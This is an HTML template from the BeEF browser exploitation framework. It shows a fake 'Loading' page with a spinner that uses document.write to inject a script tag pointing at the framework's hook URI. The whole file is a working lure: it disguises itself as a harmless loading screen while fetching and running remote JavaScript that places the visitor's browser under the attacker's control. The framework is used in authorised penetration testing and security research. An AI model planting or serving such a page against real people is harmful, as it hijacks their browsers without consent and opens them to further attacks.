<!--
    Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission
-->
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>Loading</title>
<script>
	var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';
	document.write(commandModuleStr);
</script>
</head><body>
	<br>
	<br>
	<br>
<div align="middle"><img src="ajax-loader.gif" /></div>
</body></html>
